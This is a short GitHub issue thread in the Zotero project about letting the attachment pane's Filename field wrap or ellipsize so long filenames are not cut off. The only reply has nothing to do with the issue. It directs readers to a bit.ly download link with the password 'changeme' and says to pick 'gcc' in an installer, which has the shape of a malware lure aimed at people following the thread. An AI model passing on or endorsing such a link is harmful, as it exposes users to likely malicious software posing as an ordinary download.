### ISSUE TITLE
Allow attachment box Filename field to wrap, or ellipsize in the middle?

### ISSUE THREAD

**Issue by AbeJellinek** [zotero/zotero#4637]
Finder does the latter. The current Filename field is definitely not that useful, since auto-renamed filenames are almost always going to be cut off.

https://forums.zotero.org/discussion/comment/472148/#Comment_472148

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
